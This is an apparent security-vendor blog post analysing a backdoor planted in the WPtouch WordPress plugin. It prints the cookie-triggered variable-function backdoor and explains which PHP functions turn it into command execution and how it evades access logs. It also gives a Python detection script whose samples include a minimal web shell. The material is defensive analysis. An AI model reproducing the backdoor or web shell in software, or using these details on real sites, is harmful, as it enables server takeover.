
WordPress plugins hacked – Understanding the backdoor


If you haven’t heard about it already, yesterday three popular WordPress plugins (AddThis, WPtouch, and W3 Total Cache) had a malicious backdoor added to them via the plugin repository. That led the WordPress.org team to reset all account passwords as a precaution. You can read about it here: Passwords Reset. I must note that the team did an amazing job dealing with this incident and getting it all fixed very fast!

However, what is interesting to us is what the team said:

Earlier today the WordPress team noticed suspicious commits to several popular plugins (AddThis, WPtouch, and W3 Total Cache) containing cleverly disguised backdoors.

Cleverly disguised backdoors? That’s something we wanted to check. We went to their repositories and found this in the WPtouch changelog:

 // $matches[1] (taken from the cookie) is called as a function with $matches[2] as its argument
 if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))
                $this->desired_view = $matches[1].$matches[2];

What does this code do

Someone skimming through the code may not see anything with malicious intent there. What it actually does: it looks for a cookie whose value has the form useragent/<name>/<argument>/ and captures the two parts into $matches. The && in the if condition then calls $matches[1]($matches[2]) before the assignment on the next line is ever reached. That works because PHP supports variable functions: a string held in a variable can be invoked with ordinary call syntax, so $matches[1] supplies the function name and $matches[2] its single argument. The assignment to $this->desired_view gives the block the look of ordinary view-selection code; the payload is the call inside the condition.

So anyone who can send a cookie to the site, which is everyone, gets to pick the function: system, exec, passthru or shell_exec runs an arbitrary command on the server as the web server user, and assert (which in PHP 5 evaluates a string argument as PHP code) gives arbitrary PHP execution. One detail worth knowing: eval itself would not work through this path, because it is a language construct rather than a function, so calling it through a variable fails with an undefined-function error. Two more details follow from the regex and the transport. Both captures exclude the / character, so anything containing a path has to be encoded or fetched some other way. And because the payload travels in the Cookie header, it never shows up in a default Apache or nginx access log, which makes this far quieter than a backdoor keyed on a GET parameter; if you are hunting for abuse of this backdoor, you need cookie logging or a web application firewall log, not the plain access log.
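The pattern behind this backdoor, request data deciding which function gets called, is something you can look for in plugin code without reading every line. The script below is an added example for this article, not code from WPtouch, WordPress or Sucuri. It is a deliberately small textual taint check, not a PHP parser: variable names assigned straight from a superglobal, or filled in by preg_match() over such data, are treated as attacker-controlled, and any call that uses one of those names as its callee is reported, alongside the classic system($_REQUEST[...]) style of web shell. The PHP sources at the bottom are constructed for the demonstration; the first wraps the two lines quoted above (the $key variable is assumed to come from surrounding code the article does not show).

```python
"""Spot PHP that lets request data choose the function to call.

Added example for this article, not code from WPtouch, WordPress or Sucuri.
A textual taint check rather than a PHP parser: names assigned from a
superglobal, or filled by preg_match() over such data, count as attacker
controlled; any call using such a name as its callee is reported.
"""
import re

SUPERGLOBAL_RE = re.compile(r"\$_(?:COOKIE|GET|POST|REQUEST|SERVER)\b")
# $name = $_COOKIE[...]  (and the other request superglobals)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*\$_(?:COOKIE|GET|POST|REQUEST|SERVER)\b")
# preg_match(pattern, subject, $out [, flags...]): $out receives the captures
PREG_RE = re.compile(
    r"preg_match\s*\(\s*(?:\"(?:\\.|[^\"\\])*\"|'(?:\\.|[^'\\])*')\s*,"
    r"\s*(?P<subject>[^,]+?)\s*,\s*\$(?P<out>\w+)\s*[,)]"
)
# $name(...) or $name[idx](...): PHP variable-function call syntax
DYN_CALL_RE = re.compile(r"\$(\w+)(?:\[[^\]]*\])?\s*\(")
# well-known sinks fed directly from request data
SINK_RE = re.compile(
    r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|assert|eval)"
    r"\s*\(\s*\$_(?:COOKIE|GET|POST|REQUEST)\b"
)
VAR_RE = re.compile(r"\$(\w+)")


def tainted_names(source):
    """Variable names holding request-derived data (small fixed-point loop)."""
    tainted = {m.group(1) for m in ASSIGN_RE.finditer(source)}
    while True:
        before = len(tainted)
        for m in PREG_RE.finditer(source):
            subject = m.group("subject")
            if SUPERGLOBAL_RE.search(subject) or set(VAR_RE.findall(subject)) & tainted:
                tainted.add(m.group("out"))
        if len(tainted) == before:
            return tainted


def scan_php(source):
    """Return (line_number, kind, stripped_line) for each suspicious call."""
    tainted = tainted_names(source)
    findings = []
    for number, line in enumerate(source.splitlines(), 1):
        if SINK_RE.search(line):
            findings.append((number, "sink-on-request-data", line.strip()))
            continue
        if any(m.group(1) in tainted for m in DYN_CALL_RE.finditer(line)):
            findings.append((number, "request-controlled-callee", line.strip()))
    return findings


# Constructed sample: the two lines quoted in the article; $key is assumed to
# be set by surrounding code that the article does not show.
BACKDOOR = r'''<?php
// $key comes from the surrounding loop over cookies (not shown in the article)
if (preg_match("#useragent/([^/]*)/([^/]*)/#i", $_COOKIE[$key], $matches) && $matches[1]($matches[2]))
    $this->desired_view = $matches[1].$matches[2];
'''
# Constructed sample: the unsubtle version of the same idea.
WEB_SHELL = r"""<?php
if (isset($_REQUEST['c'])) { echo system($_REQUEST['c']); }
"""
# Constructed sample: the cookie goes through an intermediate variable first.
TWO_STEP = r"""<?php
$ua = $_COOKIE['ua'];
if (preg_match('#^(\w+)/(.*)$#', $ua, $m)) { $m[1]($m[2]); }
"""
# Constructed sample: a variable function whose callee comes from a fixed
# whitelist, not from the request; must not be reported.
BENIGN = r"""<?php
$handlers = array('json' => 'json_encode', 'dump' => 'var_export');
$format = $_GET['format'];
$fn = isset($handlers[$format]) ? $handlers[$format] : 'json_encode';
echo $fn($data);
"""
SAMPLES = {"backdoor": BACKDOOR, "web_shell": WEB_SHELL,
           "two_step": TWO_STEP, "benign": BENIGN}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, "->", scan_php(src) or "clean")
```

Run it over a plugin directory by feeding each .php file to scan_php(); the benign sample shows the intended precision, a dynamic call whose callee is chosen from a hardcoded array is not reported even though the index comes from the request. The check is textual, so expressions with a comma inside the preg_match subject or taint that flows through string concatenation or function return values will be missed; it is a fast first pass, not a substitute for reviewing the diff of what an update actually changed.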

Kudos to the WordPress Core Team

Again, a very clever backdoor, and I am impressed that the WordPress team caught this among so many plugins and commits. I wasn’t able to check the other plugins, because it seems the plugin repository is down at the moment.

Another thing to highlight, which Matt stated in the news release, is to make sure you update your plugins. Keeping your software up to date gives you the latest patches and security fixes, which in turn lowers your risk. In this case the backdoor travelled through that same update channel, so the advice cuts both ways: update to the cleaned releases, and if your site pulled one of these plugins while the bad commits were live, treat it as potentially compromised rather than assuming the next update cleaned everything up.

If you are worried your site might have been hacked, try scanning it with Sucuri SiteCheck to see if there is anything wrong.
